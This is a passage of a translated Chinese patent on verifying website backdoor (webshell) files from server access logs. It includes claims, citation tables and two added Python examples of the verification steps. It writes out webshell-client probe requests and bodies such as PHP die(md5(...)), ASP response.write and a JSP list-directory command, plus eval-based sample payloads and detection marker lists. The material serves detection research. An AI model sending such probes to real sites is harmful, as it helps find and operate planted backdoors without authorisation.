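Records with verdict "to_verify" carry the URL, type and password that the verification stage below needs; "suspected" records matched only the fixed field and, as the page says, are not enough on their own.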
Optionally, in step S208, verifying by the chosen verification mode whether the file accessed by the internet access request record to be verified is a website backdoor file may include the following steps:
Step S6: extract, from the internet access request record to be verified, the connection password used to access the corresponding file;
Step S7: when the request type is PHP or ASP, search the internet access request record to be verified for the executable code section corresponding to the connection password;
Step S8: run the executable code section according to a preset calculation and generate an operation result;
Step S9: when the operation result is consistent with the preset result, determine that the file accessed by the internet access request record to be verified is a website backdoor file.
A URL extracted during the log analysis above because it matches the characteristics of the Webshell management tool's communication protocol does not necessarily point to a backdoor file. The reason is that many attackers on the current network actively scan for website backdoor files; these scan requests themselves carry fixed URL addresses and also use the Webshell management tool's communication protocol to try to interact with the target file. Such scan requests therefore meet some of the protocol characteristics of Webshell management tools and may be taken for backdoor files. The presence of this active scanning behaviour thus easily produces a large number of false positives in which the site file at a URL is reported as a backdoor file.
Effective technical means are therefore needed to exclude the false positives caused by such active scanning for website backdoor files. For this, first, a separate backdoor verification scheme is designed for the backdoor files of each programming language; second, the suffix of the backdoor URL obtained from the log analysis process (the URL whose traffic matched the communication characteristics of the Webshell management tool) determines which specific verification scheme to use; then the connection password is reused to verify the backdoor file, and only a website backdoor URL that is finally verified successfully is definitively regarded as a website backdoor file that currently exists.
1. For PHP-type internet access requests:
Because the content on the other side of the equals sign from the connection password is executed directly by the server, one can first try to make the file perform a simple calculation and then display the result. If the content returned by the calculation is consistent with the expected result, the file is confirmed to be a Webshell.
Assume that a PHP-type access request sent by a Webshell management tool is as follows:
POST /hehe.php HTTP/1.1
Content-Type:application/x-www-form-urlencoded
Host:127.0.0.1
Content-Length:765
Connection:Close
Find the executable code section corresponding to the connection password via the connection password digit "8", and generate the operation result according to the calculation set as follows:
8=die (md5 (233333));
If the operation result returns fb0b32aeafac4591c7ae6d5e58308344, which is consistent with the expected calculation result, the verification is confirmed successful and the file accessed by this PHP-type internet access request is a website backdoor file.
2. For ASP-type internet access requests:
The verification principle is the same as for PHP-type access requests. Assume that an ASP-type access request sent by a Webshell management tool is as follows:
POST /hehe.asp HTTP/1.1
Content-Type:application/x-www-form-urlencoded
Host:127.0.0.1
Content-Length:765
Connection:Close
Find the executable code section corresponding to the connection password via the connection password digit "8", and generate the operation result according to the calculation set as follows:
8=response.write (654363512+3656342)
If the operation result returns 658019854, which is consistent with the expected calculation result, the verification is confirmed successful and the file accessed by this ASP-type internet access request is a website backdoor file.
Optionally, in step S208, verifying by the chosen verification mode whether the file accessed by the internet access request record to be verified is a website backdoor file may include the following operations:
Step S10: extract, from the internet access request record to be verified, the connection password used to access the corresponding file;
Step S11: when the request type is JSP, search the internet access request record to be verified for the executable code section corresponding to the connection password;
Step S12: run the executable code section according to a specified function command and generate a display result;
Step S13: when the display result matches the functional characteristic of the function command, determine that the file accessed by the internet access request record to be verified is a website backdoor file.
For JSP-type internet access requests:
Because a JSP trojan cannot directly execute the code in the POST content and can only execute a small number of preset commands, one can try to execute the "list directory" operation. That is, assume that a JSP-type access request sent by a Webshell management tool is as follows:
POST /hehe.jsp HTTP/1.1
Content-Type:application/x-www-form-urlencoded
Host:127.0.0.1
Content-Length:765
Connection:Close
Find the executable code section corresponding to the connection password via the connection password digit "8", and generate the display result according to the function command set as follows:
8=A&z0=UTF-8
If the returned display result carries "|<-" and "->|", the operation currently executed is "list directory"; the verification succeeds and the file accessed by this JSP-type internet access request is a website backdoor file.
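The verification stage described above (steps S6 to S13 and the three per-type probes), written as an added example that is not the patent's or Alibaba's code. It builds the page's probe body for each request type from the connection password recovered in log analysis, computes the expected result on the analyst's side with hashlib rather than copying it from the page, and checks the file's reply. The transport is left to the caller as a `send(url, body)` callable; the canned replies below stand in for the server under investigation so the example runs offline, and the `/index.php` entry is a constructed ordinary page that matched in the logs only because a scanner hit it, which is the false-positive case the page wants excluded.

```python
import hashlib


def build_probe(request_type: str, password: str) -> str:
    """Probe bodies from the page; the recovered password replaces the literal '8'."""
    if request_type == "php":
        return f"{password}=die(md5(233333));"
    if request_type == "asp":
        return f"{password}=response.write(654363512+3656342)"
    if request_type == "jsp":
        return f"{password}=A&z0=UTF-8"   # 'A': the list-directory opcode
    raise ValueError(f"unsupported request type: {request_type}")


def expected_result(request_type: str):
    """Steps S8/S9: the preset result, computed locally and never taken from the file."""
    if request_type == "php":
        return hashlib.md5(b"233333").hexdigest()
    if request_type == "asp":
        return str(654363512 + 3656342)   # "658019854"
    return None   # JSP is judged by its functional characteristic instead


def verify_response(request_type: str, response_body: str) -> bool:
    body = response_body.strip()
    if request_type == "jsp":
        # Step S13: a directory listing is bracketed by the "->|" and "|<-" markers.
        return "->|" in body and "|<-" in body
    return body == expected_result(request_type)


def run_verification(candidates, send):
    """candidates: dicts with url/type/password from the log-analysis stage;
    send(url, body) -> reply text. Returns (url, confirmed) pairs; only a
    confirmed URL is treated as an existing website backdoor file."""
    results = []
    for cand in candidates:
        probe = build_probe(cand["type"], cand["password"])
        try:
            reply = send(cand["url"], probe)
        except Exception:        # unreachable or erroring file: not confirmed
            reply = ""
        results.append((cand["url"], verify_response(cand["type"], reply)))
    return results


# Constructed stand-in for the web server: canned replies keyed by URL.
_CANNED = {
    "/hehe.php": hashlib.md5(b"233333").hexdigest(),
    "/hehe.asp": "658019854",
    "/hehe.jsp": "->|\tconf\t2016-02-20 10:00:00\t0\t0755\n|<-",
    # Ordinary page hit by a scanner: it just returns its normal HTML.
    "/index.php": "<html><body>Welcome</body></html>",
}


def fake_send(url: str, body: str) -> str:
    return _CANNED[url]


# Constructed output of the log-analysis stage for the four URLs above.
CANDIDATES = [
    {"url": "/hehe.php", "type": "php", "password": "8"},
    {"url": "/hehe.asp", "type": "asp", "password": "8"},
    {"url": "/hehe.jsp", "type": "jsp", "password": "8"},
    {"url": "/index.php", "type": "php", "password": "8"},
]

if __name__ == "__main__":
    for url, ok in run_verification(CANDIDATES, fake_send):
        print(url, "confirmed backdoor file" if ok else "rejected (false positive)")
```

Comparing against a locally computed value, rather than against whatever the file prints, is what lets the scanner-hit page fall through: it echoes its normal content, which never equals the preset result.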
It should be noted that, for brevity, each of the foregoing method embodiments is expressed as a series of combined actions; those skilled in the art should know, however, that the present invention is not limited by the described sequence of actions, since according to the present invention some steps may be carried out in other orders or simultaneously. Secondly, those skilled in the art should also know that the embodiments described in this description are preferred embodiments, and the actions and modules involved are not necessarily required by the present invention.
Through the above description of the embodiments, those skilled in the art can clearly understand that the verification method of the website backdoor file according to the above embodiments can be implemented by software plus the required general hardware platform, and of course also by hardware, but in many cases the former is the better embodiment. On this understanding, the technical solution of the present invention, or the part of it that contributes to the prior art, can be embodied in the form of a software product stored in a storage medium (such as ROM/RAM, magnetic disk or optical disc) that includes instructions causing a terminal device (which may be a mobile phone, computer, server or network device) to perform the method described in each embodiment of the present invention.
Embodiment 2
According to an embodiment of the present invention, a verification device for implementing the above website backdoor file verification method is also provided. As shown in Fig. 3, the device includes: an acquisition module 10 for obtaining network access log records; an analysis module 20 for analysing the network access log records according to the communication protocol used to access website backdoor files and choosing internet access request records to be verified; a choosing module 30 for choosing a verification mode according to the request type to which the internet access request record to be verified belongs; and a verification module 40 for verifying, by the chosen verification mode, whether the file accessed by the internet access request record to be verified is a website backdoor file.
Optionally, Fig. 4 is a structural block diagram of the verification device of the website backdoor file according to a preferred embodiment of the invention. As shown in Fig. 4, the analysis module 20 may include: a parsing unit 200 for parsing, one by one and segment by segment, all internet access request records contained in the network access log records using the communication protocol; and a first determining unit 202 for determining, as internet access request records to be verified, those whose parsed request body content contains the code segment executed by the website backdoor file and/or the fixed field set in the communication protocol.
Optionally, as shown in Fig. 4, the choosing module 30 may include: a first extraction unit 300 for extracting the URL from the request line of the internet access request record to be verified; a second determining unit 302 for determining the request type from the suffix of the URL; and a choosing unit 304 for choosing the verification mode for the internet access request record to be verified according to the request type.
Optionally, as shown in Fig. 4, the verification module 40 may include: a second extraction unit 400 for extracting, from the internet access request record to be verified, the connection password used to access the corresponding file; a searching unit 402 for searching, when the request type is PHP or ASP, the internet access request record to be verified for the executable code section corresponding to the connection password; a generation unit 404 for running the executable code section according to a preset calculation and generating an operation result; and a third determining unit 406 for determining, when the operation result is consistent with the preset result, that the file accessed by the internet access request record to be verified is a website backdoor file.
Optionally, the verification module 40 may include: a second extraction unit 400 for extracting, from the internet access request record to be verified, the connection password used to access the corresponding file; a searching unit 402 for searching, when the request type is JSP, the internet access request record to be verified for the executable code section corresponding to the connection password; a generation unit 404 for running the executable code section according to a specified function command and generating a display result; and a third determining unit 406 for determining, when the display result matches the functional characteristic of the function command, that the file accessed by the internet access request record to be verified is a website backdoor file.
Embodiment 3
Embodiments of the invention may also provide a computer terminal, which may be any computer terminal in a group of computer terminals. Optionally, in this embodiment, the computer terminal may also be replaced by a terminal device such as a mobile terminal.
Optionally, in this embodiment, the computer terminal may be located on at least one of multiple network devices of a computer network.
Optionally, Fig. 5 is a structural block diagram of a computer terminal according to an embodiment of the present invention. As shown in Fig. 5, the computer terminal may include one or more processors (only one is shown in the figure) and a memory.
The memory may be used to store software programs and modules, such as the program instructions/modules corresponding to the verification method and device of the website backdoor file in the embodiments of the present invention; by running the software programs and modules stored in the memory, the processor performs various function applications and data processing, i.e. implements the above verification method of the website backdoor file. The memory may include high-speed random access memory and may also include non-volatile memory, such as one or more magnetic storage devices, flash memory or other non-volatile solid-state memory. In some examples, the memory may further include memory located remotely from the processor, connected to the computer terminal through a network. Examples of such networks include, but are not limited to, the internet, an intranet, a local area network, a mobile communication network and combinations thereof.
The processor can call the information and application programs stored in the memory through the transmission device to perform the following steps:
S1: obtain network access log records;
S2: analyse the network access log records according to the communication protocol used to access website backdoor files, and choose internet access request records to be verified;
S3: choose a verification mode according to the request type to which the internet access request record to be verified belongs;
S4: verify, by the chosen verification mode, whether the file accessed by the internet access request record to be verified is a website backdoor file.
Optionally, the above processor may also execute program code for the following steps: parsing, one by one and segment by segment, all internet access request records contained in the network access log records using the communication protocol; determining, as internet access request records to be verified, those whose parsed request body content contains the code segment executed by the website backdoor file and/or the fixed field set in the communication protocol.
Optionally, the above processor may also execute program code for the following steps: extracting the uniform resource locator (URL) from the request line of the internet access request record to be verified; determining the request type from the suffix of the URL; choosing the verification mode for the internet access request record to be verified according to the request type.
Optionally, the above processor may also execute program code for the following steps: extracting, from the internet access request record to be verified, the connection password used to access the corresponding file; when the request type is PHP or ASP, searching the internet access request record to be verified for the executable code section corresponding to the connection password; running the executable code section according to a preset calculation and generating an operation result; when the operation result is consistent with the preset result, determining that the file accessed by the internet access request record to be verified is a website backdoor file.
Optionally, the above processor may also execute program code for the following steps: extracting, from the internet access request record to be verified, the connection password used to access the corresponding file; when the request type is JSP, searching the internet access request record to be verified for the executable code section corresponding to the connection password; running the executable code section according to a specified function command and generating a display result; when the display result matches the functional characteristic of the function command, determining that the file accessed by the internet access request record to be verified is a website backdoor file.
With the embodiments of the present invention, a verification scheme for website backdoor files is provided. Internet access request records to be verified are chosen by analysing the network access log records retained on the server according to the communication protocol used to access website backdoor files, and a verification mode chosen according to the request type of each such record confirms whether the network backdoor file really exists. This effectively improves the success rate of identifying website backdoor files and greatly reduces the probability of false negatives and false positives during verification, thereby solving the technical problem of the related art, in which website backdoor files are determined by feature matching, with low accuracy and a tendency to false negatives and false positives.
Those skilled in the art will appreciate that the structure shown in Fig. 5 is only illustrative; the computer terminal may also be a smartphone (such as an Android phone or iOS phone), a tablet computer, a palmtop computer, a mobile internet device (MID), a PAD or similar terminal device. Fig. 5 does not limit the structure of the above electronic device. For example, the computer terminal may include more or fewer components (such as network interfaces or display devices) than shown in Fig. 5, or have a configuration different from that shown in Fig. 5.
One of ordinary skill in the art will appreciate that all or part of the steps in the methods of the above embodiments can be completed by a program instructing the hardware of the terminal device; the program may be stored in a computer-readable storage medium, which may include a flash disk, read-only memory (ROM), random access memory (RAM), magnetic disk or optical disc.
Embodiment 4
Embodiments of the invention also provide a storage medium. Optionally, in this embodiment, the storage medium may be used to store the program code executed by the verification method of the website backdoor file provided in embodiment 1 above.
Optionally, in this embodiment, the storage medium may be located in any computer terminal of a computer terminal group in a computer network, or in any mobile terminal of a mobile terminal group.
Optionally, in this embodiment, the storage medium is arranged to store program code for performing the following steps:
S1: obtain network access log records;
S2: analyse the network access log records according to the communication protocol used to access website backdoor files, and choose internet access request records to be verified;
S3: choose a verification mode according to the request type to which the internet access request record to be verified belongs;
S4: determine, by the chosen verification mode, whether the file accessed by the internet access request record to be verified is a website backdoor file.
Optionally, in this embodiment, the storage medium is also arranged to store program code for performing the following steps: parsing, one by one and segment by segment, all internet access request records contained in the network access log records using the communication protocol; determining, as internet access request records to be verified, those whose parsed request body content contains the code segment executed by the website backdoor file and/or the fixed field set in the communication protocol.
Optionally, in this embodiment, the storage medium is also arranged to store program code for performing the following steps: extracting the uniform resource locator (URL) from the request line of the internet access request record to be verified; determining the request type from the suffix of the URL; choosing the verification mode for the internet access request record to be verified according to the request type.
Optionally, in this embodiment, the storage medium is also arranged to store program code for performing the following steps: extracting, from the internet access request record to be verified, the connection password used to access the corresponding file; when the request type is PHP or ASP, searching the internet access request record to be verified for the executable code section corresponding to the connection password; running the executable code section according to a preset calculation and generating an operation result; when the operation result is consistent with the preset result, determining that the file accessed by the internet access request record to be verified is a website backdoor file.
Optionally, in this embodiment, the storage medium is also arranged to store program code for performing the following steps: extracting, from the internet access request record to be verified, the connection password used to access the corresponding file; when the request type is JSP, searching the internet access request record to be verified for the executable code section corresponding to the connection password; running the executable code section according to a specified function command and generating a display result; when the display result matches the functional characteristic of the function command, determining that the file accessed by the internet access request record to be verified is a website backdoor file.
The embodiments of the present invention are numbered for description only and the numbering does not represent the merits of the embodiments.
In the above embodiments of the present invention, the description of each embodiment has its own emphasis; for parts not described in detail in one embodiment, reference may be made to the related description of the other embodiments.
In the several embodiments provided in this application, it should be understood that the disclosed technical content may be implemented in other ways. The device embodiments described above are merely illustrative; for example, the division into units is only a division by logical function, and other divisions are possible in actual implementation: multiple units or components may be combined or integrated into another system, or some features may be ignored or not executed. Furthermore, the mutual coupling, direct coupling or communication connection shown or discussed may be indirect coupling or communication connection through some interfaces, units or modules, and may be electrical or of other forms.
Units described as separate components may or may not be physically separate, and components shown as units may or may not be physical units; they may be located in one place or distributed over multiple network units. Some or all of the units may be selected according to actual needs to achieve the purpose of the embodiment.
In addition, the functional units in the embodiments of the present invention may be integrated in one processing unit, or each unit may exist physically alone, or two or more units may be integrated in one unit. The integrated unit may be implemented in the form of hardware or in the form of a software functional unit.
If the integrated unit is implemented as a software functional unit and sold or used as an independent product, it may be stored in a computer-readable storage medium. On this understanding, the technical solution of the present invention, or the part of it that contributes to the prior art, or all or part of the technical solution, may be embodied in the form of a software product stored in a storage medium and including instructions for causing a computer device (which may be a personal computer, server or network device) to perform all or part of the steps of the methods described in the embodiments of the present invention. The storage medium includes a USB flash disk, read-only memory (ROM), random access memory (RAM), removable hard disk, magnetic disk, optical disc or any other medium that can store program code.
The above are only preferred embodiments of the present invention. It should be noted that those of ordinary skill in the art can make improvements and modifications without departing from the principles of the present invention, and these improvements and modifications should also be regarded as within the protection scope of the present invention.

Claims (10)

1. A method for verifying a website backdoor file, characterised in that it comprises:
obtaining network access log records;
analysing the network access log records according to the communication protocol used to access website backdoor files, and selecting internet access request records to be verified;
choosing a verification mode according to the request type to which the internet access request record to be verified belongs; and
verifying, by the chosen verification mode, whether the file accessed by the internet access request record to be verified is a website backdoor file.
2. The method according to claim 1, characterised in that analysing the network access log records according to the communication protocol used to access website backdoor files and selecting the internet access request records to be verified comprises:
parsing, one by one and segment by segment, all internet access request records contained in the network access log records using the communication protocol; and
determining as the internet access request records to be verified those records whose parsed request body content contains a code segment to be executed by the website backdoor file and/or a fixed field defined in the communication protocol.
3. The method according to claim 1, characterised in that choosing a verification mode according to the request type to which the internet access request record to be verified belongs comprises:
extracting the uniform resource locator (URL) from the request line of the internet access request record to be verified;
determining the request type from the content of the suffix part of the URL; and
choosing a verification mode for the internet access request record to be verified according to the request type.
4. The method according to claim 1 or 3, characterised in that verifying by the verification mode whether the file accessed by the internet access request record to be verified is a website backdoor file comprises:
extracting, from the internet access request record to be verified, the connection password used to access the corresponding file;
when the request type is a PHP type or an ASP type, looking up in the internet access request record to be verified the executable code section corresponding to the connection password;
running the executable code section according to a default calculation to generate an operation result; and
when the operation result is consistent with a default result, determining that the file accessed by the internet access request record to be verified is a website backdoor file.
5. The method according to claim 1 or 3, characterised in that verifying by the verification mode whether the file accessed by the internet access request record to be verified is a website backdoor file comprises:
extracting, from the internet access request record to be verified, the connection password used to access the corresponding file;
when the request type is a JSP type, looking up in the internet access request record to be verified the executable code section corresponding to the connection password;
running the executable code section according to a specified command function to generate a display result; and
when the display result matches the functional characteristic of the command function, determining that the file accessed by the internet access request record to be verified is a website backdoor file.
6. A device for verifying a website backdoor file, characterised in that it comprises:
an acquisition module for obtaining network access log records;
an analysis module for analysing the network access log records according to the communication protocol used to access website backdoor files and selecting internet access request records to be verified;
a selection module for choosing a verification mode according to the request type to which the internet access request record to be verified belongs; and
a verification module for verifying, by the chosen verification mode, whether the file accessed by the internet access request record to be verified is a website backdoor file.
7. The device according to claim 6, characterised in that the analysis module comprises:
a parsing unit for parsing, one by one and segment by segment, all internet access request records contained in the network access log records using the communication protocol; and
a first determining unit for determining as the internet access request records to be verified those records whose parsed request body content contains a code segment to be executed by the website backdoor file and/or a fixed field defined in the communication protocol.
8. The device according to claim 6, characterised in that the selection module comprises:
a first extraction unit for extracting the uniform resource locator (URL) from the request line of the internet access request record to be verified;
a second determining unit for determining the request type from the content of the suffix part of the URL; and
a selection unit for choosing a verification mode for the internet access request record to be verified according to the request type.
9. The device according to claim 6 or 8, characterised in that the verification module comprises:
a second extraction unit for extracting, from the internet access request record to be verified, the connection password used to access the corresponding file;
a lookup unit for looking up, when the request type is a PHP type or an ASP type, the executable code section corresponding to the connection password in the internet access request record to be verified;
a generation unit for running the executable code section according to a default calculation to generate an operation result; and
a third determining unit for determining, when the operation result is consistent with a default result, that the file accessed by the internet access request record to be verified is a website backdoor file.
10. The device according to claim 6 or 8, characterised in that the verification module comprises:
a second extraction unit for extracting, from the internet access request record to be verified, the connection password used to access the corresponding file;
a lookup unit for looking up, when the request type is a JSP type, the executable code section corresponding to the connection password in the internet access request record to be verified;
a generation unit for running the executable code section according to a specified command function to generate a display result; and
a third determining unit for determining, when the display result matches the functional characteristic of the command function, that the file accessed by the internet access request record to be verified is a website backdoor file.
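The pipeline of claims 1 to 5, shown end to end as an added Python example that is not code from the patent or from the assignee: it parses constructed access-log records without executing anything taken from them, selects candidate records by code fragments and fixed protocol fields (claim 2), derives the request type from the URL suffix (claim 3), and applies the PHP/ASP verification (claim 4) or the JSP verification (claim 5). The code markers, the fixed field names z0 and z1, the md5-of-literal probe standing in for the "default calculation", the user.dir read standing in for the "specified command function", and every log record are assumptions constructed for this example.

```python
import hashlib
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import unquote_plus, urlsplit

# Claim 2 indicators: fragments of code a backdoor would execute and fixed field
# names of the client protocol. Both lists are assumptions for this example.
CODE_MARKERS = ("eval(", "base64_decode(", "execute(", "runtime.getruntime(", "out.print(")
FIXED_FIELDS = ("z0", "z1")

# Claim 4's "default calculation" is modelled as a harmless md5-of-literal probe;
# claim 5's "specified command function" as reading user.dir, whose characteristic
# display result is an absolute path. Both choices are assumptions.
MD5_PROBE_RE = re.compile(r'echo\s+md5\(\s*["\']?(\w+)["\']?\s*\)')
JSP_COMMAND_RE = re.compile(r'System\.getProperty\(\s*"user\.dir"\s*\)')
ABS_PATH_RE = re.compile(r'^(/|[A-Za-z]:\\)\S*$')

@dataclass
class AccessRecord:
    """One request record from a web access log (constructed for this example)."""
    request_line: str   # e.g. 'POST /upload/img.php HTTP/1.1'
    body: str           # url-encoded POST body
    response: str = ""  # response body if the log stores it, else empty

def parse_body(body: str) -> dict:
    """Split a url-encoded body into parameters; nothing in it is ever executed."""
    params = {}
    for pair in body.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params[unquote_plus(name)] = unquote_plus(value)
    return params

def is_candidate(rec: AccessRecord) -> bool:
    """Claim 2: keep records whose body carries executable code or a fixed field."""
    params = parse_body(rec.body)
    has_code = any(m in v.lower() for v in params.values() for m in CODE_MARKERS)
    return has_code or any(f in params for f in FIXED_FIELDS)

def request_type(rec: AccessRecord) -> Optional[str]:
    """Claim 3: request type from the suffix of the URL in the request line."""
    name = urlsplit(rec.request_line.split()[1]).path.rsplit("/", 1)[-1]
    suffix = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return {"php": "PHP", "asp": "ASP", "aspx": "ASP", "jsp": "JSP"}.get(suffix)

def connection_password(rec: AccessRecord) -> Optional[str]:
    """Claims 4 and 5: the parameter whose value carries code is the connection password."""
    for name, value in parse_body(rec.body).items():
        if any(m in value.lower() for m in CODE_MARKERS):
            return name
    return None

def code_section(rec: AccessRecord, password: str) -> str:
    """The executable section travels in a fixed field when one is present,
    otherwise in the password parameter itself (assumed layout)."""
    params = parse_body(rec.body)
    for f in FIXED_FIELDS:
        if f in params:
            return params[f]
    return params.get(password, "")

def verify_php_asp(rec: AccessRecord, password: str) -> bool:
    """Claim 4: compute what the probe should yield and compare with the logged response."""
    m = MD5_PROBE_RE.search(code_section(rec, password))
    if not m:
        return False
    return hashlib.md5(m.group(1).encode()).hexdigest() in rec.response

def verify_jsp(rec: AccessRecord, password: str) -> bool:
    """Claim 5: the section calls the command function and the display result has its characteristic."""
    called = JSP_COMMAND_RE.search(code_section(rec, password)) is not None
    return called and ABS_PATH_RE.match(rec.response.strip()) is not None

def classify(rec: AccessRecord) -> dict:
    """Claim 1 end to end for one record."""
    result = {"request": rec.request_line, "candidate": is_candidate(rec),
              "type": request_type(rec), "password": None, "backdoor": False}
    if result["candidate"]:
        result["password"] = connection_password(rec)
    if result["password"] is not None and result["type"] is not None:
        verifier = verify_jsp if result["type"] == "JSP" else verify_php_asp
        result["backdoor"] = verifier(rec, result["password"])
    return result

# Constructed log records: a benign login, a PHP backdoor session whose response
# echoes the md5 probe, a JSP session, and a candidate that does not verify.
SAMPLE_LOG = [
    AccessRecord("POST /login.php HTTP/1.1", "user=alice&pass=hunter2", "<html>ok</html>"),
    AccessRecord("POST /upload/img.php HTTP/1.1",
                 'pw=@eval($_POST["z0"]);&z0=echo md5("1234");',
                 "81dc9bdb52d04dc20036dbd8313ed055"),
    AccessRecord("POST /app/help.jsp HTTP/1.1",
                 'k=out.print(System.getProperty("user.dir"));',
                 "/opt/tomcat/webapps/app"),
    AccessRecord("POST /cache/tmp.php HTTP/1.1", 'pw=@eval($_POST["z0"]);&z0=echo 1;', ""),
]

def flagged_requests(records) -> list:
    """Request lines whose accessed file verified as a backdoor."""
    return [r["request"] for r in map(classify, records) if r["backdoor"]]
```

Because the "default calculation" is replaced by a regex-recognised probe whose result is computed locally, the verifier never evaluates content from the log; a candidate whose code section is not the recognised probe stays unverified instead of being run, which is the edge case the last sample record exercises. On the sample log, flagged_requests returns the img.php and help.jsp request lines only.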
CN201610096648.2A 2016-02-22 2016-02-22 Verification method and device for website backdoor file Active CN107104924B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201610096648.2A CN107104924B (en) 2016-02-22 2016-02-22 Verification method and device for website backdoor file

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201610096648.2A CN107104924B (en) 2016-02-22 2016-02-22 Verification method and device for website backdoor file

Publications (2)

Publication Number Publication Date
CN107104924A true CN107104924A (en) 2017-08-29
CN107104924B CN107104924B (en) 2020-10-09

Family

ID=59658691

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201610096648.2A Active CN107104924B (en) 2016-02-22 2016-02-22 Verification method and device for website backdoor file

Country Status (1)

Country Link
CN (1) CN107104924B (en)

Cited By (8)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN107911355A (en) * 2017-11-07 2018-04-13 杭州安恒信息技术有限公司 A kind of website back door based on attack chain utilizes event recognition method
CN109040071A (en) * 2018-08-06 2018-12-18 杭州安恒信息技术股份有限公司 A kind of confirmation method of WEB backdoor attack event
CN110868410A (en) * 2019-11-11 2020-03-06 恒安嘉新(北京)科技股份公司 Method and device for acquiring webpage Trojan horse connection password, electronic equipment and storage medium
CN112073418A (en) * 2020-09-10 2020-12-11 北京微步在线科技有限公司 Encrypted flow detection method and device and computer readable storage medium
CN112182561A (en) * 2020-09-24 2021-01-05 百度在线网络技术(北京)有限公司 Method and device for detecting rear door, electronic equipment and medium
CN113225357A (en) * 2021-07-08 2021-08-06 北京搜狐新媒体信息技术有限公司 Evidence obtaining method and related device for webpage backdoor
CN113722639A (en) * 2021-08-25 2021-11-30 北京奇艺世纪科技有限公司 Website access verification method and device, electronic equipment and readable storage medium
CN114006706A (en) * 2020-07-13 2022-02-01 深信服科技股份有限公司 Network security detection method, system, computer device and readable storage medium

Citations (5)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20120005743A1 (en) * 2010-06-30 2012-01-05 Mitsubishi Electric Corporation Internal network management system, internal network management method, and program
CN102426634A (en) * 2011-10-26 2012-04-25 中国信息安全测评中心 Method for finding back door of source code
US20150256551A1 (en) * 2012-10-05 2015-09-10 Myoung Hun Kang Log analysis system and log analysis method for security system
CN105069355A (en) * 2015-08-26 2015-11-18 厦门市美亚柏科信息股份有限公司 Static detection method and apparatus for webshell deformation
CN105302707A (en) * 2014-06-06 2016-02-03 腾讯科技(深圳)有限公司 Application vulnerability detection method and apparatus

Non-Patent Citations (1)

* Cited by examiner, † Cited by third party
Title
石刘洋: "基于web日志的webshell检测方法研究" (Research on webshell detection methods based on web logs), 《信息安全研究》 (Information Security Research) *

Cited By (14)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN107911355B (en) * 2017-11-07 2020-05-01 杭州安恒信息技术股份有限公司 Website backdoor utilization event identification method based on attack chain
CN107911355A (en) * 2017-11-07 2018-04-13 杭州安恒信息技术有限公司 A kind of website back door based on attack chain utilizes event recognition method
CN109040071B (en) * 2018-08-06 2021-02-09 杭州安恒信息技术股份有限公司 Method for confirming WEB backdoor attack event
CN109040071A (en) * 2018-08-06 2018-12-18 杭州安恒信息技术股份有限公司 A kind of confirmation method of WEB backdoor attack event
CN110868410A (en) * 2019-11-11 2020-03-06 恒安嘉新(北京)科技股份公司 Method and device for acquiring webpage Trojan horse connection password, electronic equipment and storage medium
CN110868410B (en) * 2019-11-11 2022-05-10 恒安嘉新(北京)科技股份公司 Method and device for acquiring webpage Trojan horse connection password, electronic equipment and storage medium
CN114006706A (en) * 2020-07-13 2022-02-01 深信服科技股份有限公司 Network security detection method, system, computer device and readable storage medium
CN112073418A (en) * 2020-09-10 2020-12-11 北京微步在线科技有限公司 Encrypted flow detection method and device and computer readable storage medium
CN112073418B (en) * 2020-09-10 2022-01-14 北京微步在线科技有限公司 Encrypted flow detection method and device and computer readable storage medium
CN112182561A (en) * 2020-09-24 2021-01-05 百度在线网络技术(北京)有限公司 Method and device for detecting rear door, electronic equipment and medium
CN112182561B (en) * 2020-09-24 2024-04-30 百度在线网络技术(北京)有限公司 Rear door detection method and device, electronic equipment and medium
CN113225357A (en) * 2021-07-08 2021-08-06 北京搜狐新媒体信息技术有限公司 Evidence obtaining method and related device for webpage backdoor
CN113722639A (en) * 2021-08-25 2021-11-30 北京奇艺世纪科技有限公司 Website access verification method and device, electronic equipment and readable storage medium
CN113722639B (en) * 2021-08-25 2023-08-25 北京奇艺世纪科技有限公司 Website access verification method, device, electronic equipment and readable storage medium

Also Published As

Publication number Publication date
CN107104924B (en) 2020-10-09

Similar Documents

Publication Publication Date Title
CN107104924A (en) The verification method and device of website backdoor file
CN103607385B (en) Method and apparatus for security detection based on browser
CN103944890B (en) Virtual interaction system based on customer end/server mode and method
CN104468592B (en) Login method and login system
US9264435B2 (en) Apparatus and methods for access solutions to wireless and wired networks
US7293281B1 (en) Method and system for verifying a client request
CN104519050B (en) Login method and login system
CN107016074B (en) Webpage loading method and device
CN102591889A (en) Method and device for assisting user input based on browser of mobile terminal
CN106453216A (en) Malicious website interception method, malicious website interception device and client
CN105939326A (en) Message processing method and device
CN105553999B (en) Application user behavioural analysis and method of controlling security and its corresponding device
CN108696490A (en) The recognition methods of account permission and device
CN106453266A (en) Abnormal networking request detection method and apparatus
CN105302707B (en) The leak detection method and device of application program
CN108810896A (en) The connection authentication method and device of wireless access point
CN105306414A (en) Port vulnerability detection method, device and system
CN103444215A (en) Methods and apparatuses for avoiding damage in network attacks
CN103647652B (en) A kind of method for realizing data transfer, device and server
Kaur et al. Browser fingerprinting as user tracking technology
CN108259457A (en) A kind of WEB authentication methods and device
CN103634111B (en) Single-point logging method and system and single sign-on client-side
CN107332804A (en) The detection method and device of webpage leak
CN105554136B (en) Backup Data restoring method, apparatus and system
CN108924159A (en) The verification method and device in a kind of message characteristic identification library

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant